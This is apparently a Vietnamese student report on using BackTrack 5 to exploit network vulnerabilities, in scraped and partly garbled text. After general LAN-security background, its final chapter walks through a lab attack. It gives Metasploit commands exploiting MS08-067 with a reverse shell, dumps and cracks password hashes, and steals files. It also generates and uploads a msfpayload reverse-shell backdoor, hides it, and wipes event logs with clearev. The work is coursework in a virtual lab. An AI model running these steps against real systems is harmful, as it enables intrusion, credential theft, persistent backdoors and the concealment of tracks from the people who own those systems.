Tìm hiểu backtrack 5 trong khai thác lỗ hổng an ninh mạng

46 797 2
Tìm hiểu backtrack 5 trong khai thác lỗ hổng an ninh mạng

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Tìm hiểu backtrack 5 trong khai thác lỗ hổng an ninh mạng

LỜI CẢM ƠN Để có đồ án này, thành viên nhóm xin bày tỏ lòng biết ơn sâu sắc đến thầy cô giáo trường Đại học Bách Khoa Đà Nẵng nói chung, khoa Công nghệ thông tin nói riêng, người tận tình giảng dạy, truyền đạt cho em kiến thức quý báu Nhóm em (Chí Thanh, Văn Lương, Văn Túy) xin chân thành cảm ơn thầy giáo hướng dẫn, Tiến sĩ – Nguyễn Tấn Khôi, môn An toàn thông tin mạng, khoa Công nghệ thông tin, trường Đại học Bách Khoa Đà Nẵng nhiệt tình hướng dẫn, bảo cung cấp cho nhóm nhiều kiến thức tài liệu quý suốt trình làm đồ án Nhờ giúp đỡ thầy nhóm hoàn thành đồ án Nhóm cảm ơn đến người bạn, thành viên nhóm khác giúp đỡ, hỗ trợ trình nhóm làm đề tài Những góp ý, xây dựng bạn giúp nhóm hoàn thiện kỹ mục đích đề tài Bài báo cáo không tránh khỏi có khiếm khuyết Chúng em rất mong động viên góp kiến thầy cô giáo bạn Sinh viên: Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Nhóm: 10 Lớp: 11TLT.CNTT MỤC LỤC LỜI CẢM ƠN DANH MỤC HÌNH VẼ .5 LỜI NÓI ĐẦU .7 CHƯƠNG 1:TÌM HIỂU VẤN ĐỀ BẢO MẬT MẠNG LAN CHƯƠNG 2:GIỚI THIỆU VỀ BACKTRACK .14 Hình 1.1: Tạo máy ảo 16 Hình 1.2: Chọn đường dẫn đến file cần cài đặt 17 Hình 1.3: Chọn hệ điều hành phiên tương ứng 18 Hình 1.4: Chọn thư mục để lưu file 18 Hình 1.5: Cấu hình cho file VMWare .19 Hình 1.6: Giao diện khởi động BackTrack 19 Hình 1.7: Dùng lệnh startx để vào chế độ đồ họa .20 Hình 1.8: Click Install BackTrack để cài đặt 21 Hình 1.9: Chọn ngôn ngữ 21 Hình 1.10: Cài đặt thời gian .22 Hình 1.11: Phân vùng ổ cứng 22 Hình 1.12: Phân vùng swap .23 Hình 1.13: Phân vùng cài đặt file hệ thống 23 Hình 1.14: Tiến trình cài đặt 24 Hình 3.1 Quá trình tấn công hệ thống .26 Hình 3.2: Mô hình triển khai .27 Hình 3.3: Các bước thực 28 Hình 4.1: Công cụ Zenmap 29 Hình 4.2: Địa IP máy Victim .30 Hình 4.3: Kết sau quét 31 Hình 4.4: Lỗi MS08-067 31 Hình 4.5: Tools Armitage 32 Hình 4.6: Giao diện máy Victim trước bị tấn công 33 Hình 4.7: Máy Victim bị tấn công .34 Hình 4.8: Kết sau thực thi lệnh mkdir 36 Hình 4.9: User Password Victim 36 Hình 4.10: Lưu lại mã hash user 37 Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Hình 4.11: Công cụ Findmyhash .37 Hình 4.12: Crack Password thành công 39 Hình 4.13: File download 39 Hình 4.14: Backdoor vừa tạo .40 Hình 4.15: Upload backdoor lên máy Victim 41 Hình 4.16: Máy Victim sau Upload backdoor 41 Hình 4.17: File picachu.exe bị ẩn 43 Hình 4.18: Máy Victim sau xóa dấu vết 44 TÀI LIỆU THAM KHẢO 46 Nhóm: 10 Lớp: 11TLT.CNTT DANH MỤC HÌNH VẼ Hình 1.1: Tạo máy ảo Error: Reference source not found Hình 1.2: Chọn đường dẫn đến file cần cài đặt .Error: Reference source not found Hình 1.3: Chọn hệ điều hành phiên tương ứng Error: Reference source not found Hình 1.4: Chọn thư mục để lưu file .Error: Reference source not found Hình 1.5: Cấu hình cho file VMWare Error: Reference source not found Hình 1.6: Giao diện khởi động BackTrack .Error: Reference source not found Hình 1.7: Dùng lệnh startx để vào chế độ đồ họa Error: Reference source not found Hình 1.8: Click Install BackTrack để cài đặt Error: Reference source not found Hình 1.9: Chọn ngôn ngữ .Error: Reference source not found Hình 1.10: Cài đặt thời gian Error: Reference source not found Hình 1.11: Phân vùng ổ cứng Error: Reference source not found Hình 1.12: Phân vùng swap Error: Reference source not found Hình 1.13: Phân vùng cài đặt file hệ thống .Error: Reference source not found Hình 1.14: Tiến trình cài đặt Error: Reference source not found Hình 3.1 Quá trình tấn công hệ thống Error: Reference source not found Hình 3.2: Mô hình triển khai Error: Reference source not found Hình 3.3: Các bước thực Error: Reference source not found Hình 4.1: Công cụ Zenmap Error: Reference source not found Hình 4.2: Địa IP máy Victim Error: Reference source not found Hình 4.3: Kết sau quét .Error: Reference source not found Hình 4.4: Lỗi MS08-067 Error: Reference source not found Hình 4.5: Tools Armitage .Error: Reference source not found Hình 4.6: Giao diện máy Victim trước bị tấn công Error: Reference source not found Hình 4.7: Máy Victim bị tấn công Error: Reference source not found Hình 4.8: Kết sau thực thi lệnh mkdir Error: Reference source not found Hình 4.9: User Password Victim Error: Reference source not found Hình 4.10: Lưu lại mã hash user Error: Reference source not found Hình 4.11: Công cụ Findmyhash Error: Reference source not found Hình 4.12: Crack Password thành công Error: Reference source not found Hình 4.13: File download .Error: Reference source not found Hình 4.14: Backdoor vừa tạo Error: Reference source not found Hình 4.15: Upload backdoor lên máy Victim Error: Reference source not found Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Hình 4.16: Máy Victim sau Upload backdoor Error: Reference source not found Hình 4.17: File picachu.exe bị ẩn Error: Reference source not found Hình 4.18: Máy Victim sau xóa dấu vết Error: Reference source not found Nhóm: 10 Lớp: 11TLT.CNTT LỜI NÓI ĐẦU Trong năm gần đây, việc tổ chức khai thác mạng Internet rất phát triển Mạng Internet cho phép máy tính trao đổi thông tin cách nhanh chóng, thuận tiện Mọi đối tượng sử dụng dịch vụ tiện ích Internet cách dễ dàng trao đổi thông tin, tham khảo thư viện tri thức đồ sộ nhân loại…Tai thời điểm lợi ích Internet rõ ràng phủ nhận Nhưng điều không may kèm với nguy mất an toàn thông tin Internet vấn đề hang đầu cản trở phát triển Internet Bảo đảm an toàn an ninh không nhu cầu riêng nhà cung cấp dịch vụ mà nhu cầu chính đáng người sử dụng Các thông tin nhạy cảm quốc phòng, thương mại vô giá để lọt vào tay đối thủ cạnh tranh Linux hệ điều hành họ UNIX miễn phí dùng cho máy tính cá nhân sử dụng rộng rãi Hệ điều hành Linux thu thành công nhất định Hiện Linux ngày phát triển, đánh giá cao thu hút nhiều quan tâm nhà tin học Tại Việt Nam, mặc dù Internet trở lên phổ biến mấy năm gần vấn đề an toàn an ninh mạng không ngoại lệ Mặc dù thực chưa có tổn thất lớn kinh tế tiềm ẩn rất nhiều nguy mất an toàn Các tấn công vào hệ thống để xoá bỏ liệu, ăn cắp liệu mật hoặc chạy chương trình trojan, keylogger,… ngày tăng Do đó, việc khai thác lỗ hổng an ninh mạng vấn đề phòng chống rất quan trọng Có rất nhiều biện pháp khác để khai thác lổ hổng an ninh Một biện pháp áp dụng rộng rãi sử dụng – BackTrack Thực tế cho thấy biện pháp đơn giản hiệu đạt lại rất khả quan Trên sở đó, em chọn đề tài : “ Tìm hiểu BackTrack khai thác lổ hổng an ninh mạng” Mục tiêu đề tài bao gồm : Tìm hiểu chung bảo mật mạng LAN Tìm hiểu lý thuyết BackTrack Tìm hiểu System Hacking Thực khai thác lỗi MS08_067 Bố cục đồ án gồm chương bố trí sau : • CHƯƠNG 1: TÌM HIỂU VỀ VẤN ĐỀ BẢO MẬT MẠNG LAN • CHƯƠNG 2: GIỚI THIỆU VỀ BACKTRACK • CHƯƠNG 3: SYSTEM HACKING • CHƯƠNG 4: TRIỂN KHAI TẤN CÔNG Ngoài ra, đồ án có phần phụ lục trình bày danh mục hình vẽ sử dụng bài, danh mục tài liệu tham khảo Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng CHƯƠNG 1: TÌM HIỂU VẤN ĐỀ BẢO MẬT MẠNG LAN 1.1 Giới thiệu An ninh an toàn mạng máy tính hoàn toàn vấn đề người, việc đưa hành lang pháp lý quy nguyên tắc làm việc cụ thể cần thiết Ở đây, hành lang pháp lý gồm: điều khoản luật nhà nước, văn luật, Còn quy định từng tổ chức đặt cho phù hợp với từng đặc điểm riêng Các quy định như: quy định nhân sự, việc sử dụng máy, sử dụng phần mềm, Và vậy, sẽ hiệu nhất việc đảm bảo an ninh an toàn cho hệ thống mạng máy tính ta thực triệt để giải pháp chính sách người Tóm lại, vấn đề an ninh an toàn mạng máy tính vấn đề lớn, yêu cầu cần phải có giải pháp tổng thể, không phần mềm, phần cứng máy tính mà đòi hỏi vấn đề chính sách người Và vấn đề cần phải thực cách thường xuyên liên tục, không triệt để nảy sinh theo thời gian Tuy nhiên, giải pháp tổng thể hợp lý, đặc biệt giải tốt vấn đề chính sách người ta tạo cho an toàn chắn 1.2 Vấn đề bảo mật hệ thống mạng 1.1.Các vấn dề chung bảo mật hệ thống mạng Đặc điểm chung thống mạng có nhiều người sử dụng chung phân tán hệ mặt địa lý nên việc bảo vệ tài nguyên (mất mát hoặc sử dụng không hợp lệ) phức tạp nhiều so với việc môi trường máy tính đơn lẻ, hoặc người sử dụng Hoạt động người quản trị hệ thống mạng phải đảm bảo thông tin mạng tin cậy sử dụng đúng mục đích, đối tượng đồng thời đảm bảo mạng hoạt động ổn định không bị tấn công bởi kẻ phá hoại Nhưng thực tế không mạng đảm bảo an toàn tuyệt đối, hệ thống dù bảo vệ chắn đến mức có lúc bị vô hiệu hóa bởi kẻ có ý đồ xấu 1.2.2 Một số khái niệm lịch sử bảo mật hệ thống a) Đối tượng tấn công mạng (intruder) Đối tượng cá nhân hoặc tổ chức sử dụng kiến thức mạng công cụ phá hoại (gồm phần cứng hoặc phần mềm) để dò tìm điểm yếu lỗ hổng bảo mật hệ thống, thực hoạt động xâm nhập chiếm đoạt tài nguyên trái phép Một số đối tượng tấn công mạng Hacker: kẻ xâm nhập vào mạng trái phép cách sử dụng công cụ phá mật hoặc khai thác điểm yếu thành phần truy nhập hệ thống Masquerader : Là kẻ giả mạo Nhóm: 10 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng thông tin mạng giả mạo địa IP, tên miền, định danh người dùng… Eavesdropping: Là đối tượng nghe trộm thông tin mạng, sử dụng công cụ Sniffer, sau dùng công cụ phân tích debug để lấy thông tin có giá trị Những đối tượng tấn công mạng nhằm nhiều mục đích khác ăn cắp thông tin có giá trị kinh tế, phá hoại hệ thống mạng có chủ định, hoặc hành động vô ý thức… b) Các lỗ hổng bảo mật Các lỗ hổng bảo mật điểm yếu hệ thống hoặc ẩn chứa dịch vụ mà dựa vào kẻ tấn công xâm nhập trái phép vào hệ thống để thực hành động phá hoại chiếm đoạt tài nguyên bất hợp pháp Có nhiều nguyên nhân gây lỗ hổng bảo mật: lỗi thân hệ thống, hoặc phần mềm cung cấp hoặc người quản trị yếu kém không hiểu sâu dịch vụ cung cấp… Mức độ ảnh hưởng lỗ hổng tới hệ thống khác Có lỗ hổng ảnh hưởng tới chất lượng dịch vụ cung cấp, có lỗ hổng ảnh hưởng tới toàn hệ thống hoặc phá hủy hệ thống c) Chính sách bảo mật Chính sách bảo mật tập hợp quy tắc áp dụng cho người tham gia quản trị mạng, có sử dụng tài nguyên dịch vụ mạng Đối với từng trường hợp phải có chính sách bảo mật khác Chính sách bảo mật giúp người sử dụng biết trách nhiệm việc bảo vệ tài nguyên mạng, đồng thời giúp cho nhà quản trị mạng thiết lập biên pháp đảm bảo hữu hiệu trình trang bị, cấu hình kiểm soát hoạt động hệ thống mạng 1.2.3 Các loại lỗ hổng bảo mật phương thức công mạng chủ yếu a) Các loại lỗ hổng Có nhiều tổ chức tiến hành phân loại dạng lỗ hổng đặc biệt Theo quốc phòng Mỹ loại lỗ hổng phân làm ba loại sau: Nhóm: 10 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng + Lỗ hổng loại C Cho phép thực hình thức tấn công theo DoS (Denial of Services - Từ chối dịch vụ) Mức độ nguy hiểm thấp ảnh hưởng tới chất lượng dịch vụ, làm ngưng trệ, gián đoạn hệ thống, không làm phá hỏng liệu hoặc đạt quyền truy cập bất hợp pháp DoS hình thức tấn công sử dụng giao thức ở tầng Internet giao thức TCP/IP để làm hệ thống ngưng trệ dẫn đến tình trạng từ chối người sử dụng hợp pháp truy nhập hay sử dụng hệ thống Các dịch vụ có lỗ hổng cho phép tấn công DoS nâng cấp hoặc sửa chữa phiên nhà cung cấp dịch vụ Hiện chưa có biện pháp hữu hiệu để khắc phục tình trạng tấn công kiểu thân thiết kế ở tầng Internet (IP) nói riêng giao thức TCP/IP nói chung ẩn chứa nguy tiềm tang lỗ hổng loại + Lỗ hổng loại B: Cho phép người sử dụng có thêm quyền hệ thống mà không cần kiểm tra tính hợp lệ dẫn đến mất mát thông tin yêu cầu cần bảo mật Lỗ hổng thường có ứng dụng hệ thống Có mức độ nguy hiểm trung bình Lỗ hổng loại B có mức độ nguy hiểm lỗ hổng loại C Cho phép người sử dụng nội chiếm quyền cao hoặc truy nhập không hợp pháp Những lỗ hổng loại thường xuất dịch vụ hệ thống Người sử dụng local hiểu người có quyền truy nhập vào hệ thống với số quyền hạn nhất định Tìm hiểu vấn đề bảo mật mạng LAN Một dạng khác lỗ hổng loại B xảy với chương trình viết mã nguồn C Những chương trình viết mã nguồn C thường sử dụng vùng đệm, vùng nhớ sử dụng để lưu trữ liệu trước xử lý Người lập trình thường sử dụng vùng đệm nhớ trước gán khoảng không gian nhớ cho từng khối liệu Ví dụ viết chương trình nhập trường tên người sử dụng quy định trường dài 20 ký tự khai báo: Char first_name [20]; Khai báo cho phép người sử dụng nhập tối đa 20 ký tự Khi nhập liệu ban đầu liệu lưu ở vùng đệm Khi người sử dụng nhập nhiều 20 ký tự sẽ tràn vùng đệm Những ký tự nhập thừa sẽ nằm vùng đệm khiến ta kiểm soát Nhưng kẻ tấn công chúng lợi dụng lỗ hổng để nhập vào ký tự đặc biệt để thực thi số lệnh đặc biệt hệ thống Thông thường lỗ hổng lợi dụng bởi người Nhóm: 10 10 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Ta khai thác lỗi MS08-067 tấn công vào máy victim dùng hệ điều hành Windows XP Service Pack • Bước 4: Tấn công Ta dùng tool armitage để tấn công Hình 4.5: Tools Armitage Nhấn Connect để kết nối Nhóm: 10 32 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Giao diện máy Victim trước bị tấn công Hình 4.6: Giao diện máy Victim trước bị tấn công Sử dụng câu lệnh để thực thi tấn công msf>set load windows/shell/reverse_tcp msf>use exploit/windows/smb/ms08_067_netapi msf>show options msf>set rhost 192.168.137.128 msf>set lhost 192.168.137.129 msf>set lport 4444 msf>exploit Nhóm: 10 33 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Lúc máy Victim bị tấn công Hình 4.7: Máy Victim bị tấn công Nhóm: 10 34 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Tạo thư mục ở máy victim Click chuột phải vào máy victim chọn Meterpreter 1/Interact/Command Shell Dùng lệnh cd (lệnh cd dùng để quay ngược lại bậc) Dùng lệnh mkdir (lệnh mkdir dùng để tạo thư mục) C:\>mkdir nhom10 Nhóm: 10 35 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Hình 4.8: Kết sau thực thi lệnh mkdir • Bước 5: Crack Password Click chuột phải vào máy victim chọn Meterpreter 1/Interact/Meterpreter Shell Dùng câu lệnh hashdump Ta quét tất user password máy Victim meterpreter>hashdump Hình 4.9: User Password Victim Sau Copy=>Định dạng (xóa tiền tố, giữ lại mã hash)=>Save Ví dụ: Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547 376818d4::: Sau xóa tiền tố, ta mã hash sau: 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 Nhóm: 10 36 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Hình 4.10: Lưu lại mã hash user Sử dụng công cụ findmyhash để crack password Hình 4.11: Công cụ Findmyhash Nhóm: 10 37 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Lệnh thực thi: python /findmyhash.py NTLM -f /đường dẫn file password Nhóm: 10 38 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Hình 4.12: Crack Password thành công • Bước 6: Lấy trộm tài nguyên Dùng câu lệnh Download đường dẫn file cần tải /đường dẫn lưu file meterpreter>download C:/nhom10.jpg… /root/Desktop Hình 4.13: File download • Bước 7: Tạo backdoor: thực thi câu lệnh root@bt:~# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.137.129 lport=4444 x > /root/Desktop/picachu.exe Nhóm: 10 39 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Hình 4.14: Backdoor vừa tạo Upload file backdoor lên máy Victim Câu lệnh: upload /đường dẫn file upload -> /đường dẫn máy victim meterpreter>upload /root/Desktop/picachu.exe -> C:/nhom10 Nhóm: 10 40 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Hình 4.15: Upload backdoor lên máy Victim Hình 4.16: Máy Victim sau Upload backdoor • Bước 8: Ẩn Kiểm tra file picachu.exe máy Victim Nhóm: 10 41 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Dùng lệnh cd thư mục cần đến Dùng lệnh dir để hiển thị file thư mục Để không cho máy Victim không phát file picachu.exe, ta dùng câu lệnh C:\nhom10> attrib +h picachu.exe Nhóm: 10 42 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Hình 4.17: File picachu.exe bị ẩn Muốn lại dùng lệnh: C:\nhom10> attrib -h picachu.exe • Ngoài công cụ Armitage có tiện ích khác Show Processes: xem tiến trình chạy máy Victim Log Keystrokes: tạo ghi máy hacker để ghi lại kiện bàn phím máy Victim Screenshot: chụp ảnh hình máy Victim Webcam shot: chụp ảnh Webcam • Bước 9: Xóa dấu vết Kiểm tra kiện lưu máy Victim Nhóm: 10 43 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Sử dụng câu lệnh clearev để xóa dấu vết meterpreter>clearev Kiểm tra lại kiện máy Victim Hình 4.18: Máy Victim sau xóa dấu vết Dấu vết xóa KẾT LUẬN VÀ HƯỚNG PHÁT TRIỂN Nhóm: 10 44 Lớp: 11TLT.CNTT Tìm hiểu BackTrack khai thác lỗ hổng an ninh mạng Những kết đạt Quá trình khai thác lỗi MS08_067 để tấn công hệ thống (triển khai máy ảo VMWare) Đã Crack pasword máy nạn nhân thành công, lấy trộm tài nguyên Tạo thư mục máy nạn nhân để upload backdoor Thao tác ẩn file, hiển thị file Qua mắt nạn nhân cách xóa dấu vết để lại Quá trình triển khai tấn công dựa vào lỗi MS08_067 đưa vào áp dụng thực tế tốt Những hạn chế Bài báo cáo phần nhỏ, chưa khái quát chi tiết hết Tool BackTrack R3 Hướng phát triển Để tìm hiểu hết BackTrack khai thác lỗ hổng an ninh mạng, nhóm 10 (Chí Thanh, Văn Lương, Văn Túy) cần phải cố gắng nghiên cứu học tập nhiều Sau nhóm 10 sẽ giải vấn đề hạn chế, cố gắng khai thác thêm số lỗi Windows lỗi MS10_046 Tìm hiểu khai thác lỗi không Windows XP Service Pack mà phiên cao Windows 7, Windows Nhóm: 10 45 Lớp: 11TLT.CNTT TÀI LIỆU THAM KHẢO [1] McGraw Hill Osborne, Media Hacking Exposed Sixth Edition Network Security Secrets And SolutionsJan 2009 [2] Gordon “Fyodor” Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning [3] Giáo trình bảo mật hệ thống thông tin Biên soạn: Lê Phúc [4] Nguyễn Tấn Khôi Giáo trình an toàn thông tin mạng Khoa CNTT trường Đại Học Bách Khoa Đà Nẵng [4] http://www.wikipedia.org/ [5] www.google.com.vn [6] http://www.backtrack-linux.org/downloads/ [...]... chỉ IP máy Victim • Bước 3: Quét lỗi OS bằng Nessus địa chỉ IP: 192.168.137.128 Chọn Scans/Add Nhóm: 10 30 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng Nhập vào thông số như hình dưới Hình 4.3: Kết quả sau khi quét Hình 4.4: Lỗi MS08-067 Nhóm: 10 31 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng Ta khai thác lỗi MS08-067 tấn công vào máy victim... khởi động của BackTrack Hình 1.6: Giao diện khởi động của BackTrack Gõ startx để vào chế độ đồ họa trong BackTrack Nhóm: 10 19 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng Hình 1.7: Dùng lệnh startx để vào chế độ đồ họa Để cài đặt, click vào Install BackTrack trên màn hình Desktop Nhóm: 10 20 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng Hình... vừa tải về máy tính để vá lỗi cho hệ điều hành Windows c Khởi động lại máy tính Nhóm: 10 28 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng CHƯƠNG 4: TRIỂN KHAI TẤN CÔNG • Bước 1: Dùng công cụ Zenmap, để scanning địa chỉ IP của máy Victim Hình 4.1: Công cụ Zenmap Nhóm: 10 29 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng • Bước 2: Chọn Victim... 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng Hình 1.3: Chọn hệ điều hành và phiên bản tương ứng Chọn thư mục để lưu file Hình 1.4: Chọn thư mục để lưu file Nhấn next để tiếp tục Cấu hình trong file VMWare là Memory 1024MB, Hardisk: 40GB, Network Adapter: NAT, Processors 2 Nhóm: 10 18 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng Hình 1 .5: Cấu hình... lport 4444 msf>exploit Nhóm: 10 33 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng Lúc này máy Victim đã bị tấn công Hình 4.7: Máy Victim khi bị tấn công Nhóm: 10 34 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng Tạo thư mục ở máy victim Click chuột phải vào máy victim chọn Meterpreter 1/Interact/Command Shell Dùng lệnh cd (lệnh cd dùng để quay... 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng Click New Partition Table để cài đặt Chọn free space click Add Phân vùng swap với dung lượng 2000 Hình 1.12: Phân vùng swap Phân vùng cài đặt các file hệ thống Hình 1.13: Phân vùng cài đặt các file hệ thống Click Forward để tiếp tục Nhóm: 10 23 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng Nhấn... Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco Nó cũng Nhóm: 10 14 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP) + Web application analysis: loại này chứa các... thống Nhóm: 10 13 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng CHƯƠNG 2: GIỚI THIỆU VỀ BACKTRACK 5 2.1 Giới thiệu Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập Trong các định dạng Live DVD, chúng ta sử dụng có thể Backtrack trực tiếp từ đĩa DVD mà không cần cài nó vào máy của chúng ta Backtrack cũng có thể được cài đặt.. .Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng sử dụng trên hệ thống để đạt được quyền root không hợp lệ Để hạn chế được các lỗ hổng loại B phải kiêm soát chặt chẽ cấu hình hệ thống và các chương trình + Lỗ hổng loại A Cho phép người ngoài hệ thống có thể truy cập bất hợp pháp vào hệ thống Có thể làm phá huỷ toàn bộ hệ thống Loại lỗ hổng này có mức độ rất nguy... xa Lỗi này được phát hiện vào tháng 08/2008 và đến tháng 10/2008, Microsoft tung ra bản vá lỗi Các bản Windows bị ảnh hưởng bao gồm Hệ Điều Hành Windows 2003 SP1 Windows 2003 SP2 Windows XP SP2 Windows XP SP3 3.2.2 Các bước tấn công: • Mô hình triển khai Hình 3.2: Mô hình triển khai Nhóm: 10 27 Lớp: 11TLT.CNTT Tìm hiểu BackTrack 5 trong khai thác lỗ hổng an ninh mạng • Các bước thực hiện Zenmap Scanning

Ngày đăng: 12/06/2016, 12:13

Từ khóa liên quan

Mục lục

  • DANH MỤC HÌNH VẼ

  • LỜI NÓI ĐẦU

  • CHƯƠNG 1: TÌM HIỂU VẤN ĐỀ BẢO MẬT MẠNG LAN

    • 1.1. Giới thiệu

    • 1.2. Vấn đề bảo mật hệ thống và mạng

      • 1.1. Các vấn dề chung về bảo mật hệ thống và mạng

      • 1.2.2. Một số khái niệm và lịch sử bảo mật hệ thống

      • 1.2.3. Các loại lỗ hổng bảo mật và phương thức tấn công mạng chủ yếu

      • CHƯƠNG 2: GIỚI THIỆU VỀ BACKTRACK 5

        • 2.1. Giới thiệu

        • 2.2. Mục đích

        • Hình 1.1: Tạo một máy ảo mới

        • Hình 1.2: Chọn đường dẫn đến file cần cài đặt

        • Hình 1.3: Chọn hệ điều hành và phiên bản tương ứng

        • Hình 1.4: Chọn thư mục để lưu file

        • Hình 1.5: Cấu hình cho file VMWare

        • Hình 1.6: Giao diện khởi động của BackTrack

        • Hình 1.7: Dùng lệnh startx để vào chế độ đồ họa

        • Hình 1.8: Click Install BackTrack để cài đặt

        • Hình 1.9: Chọn ngôn ngữ

        • Hình 1.10: Cài đặt thời gian

        • Hình 1.11: Phân vùng ổ cứng

        • Hình 1.12: Phân vùng swap

Tài liệu cùng người dùng

Tài liệu liên quan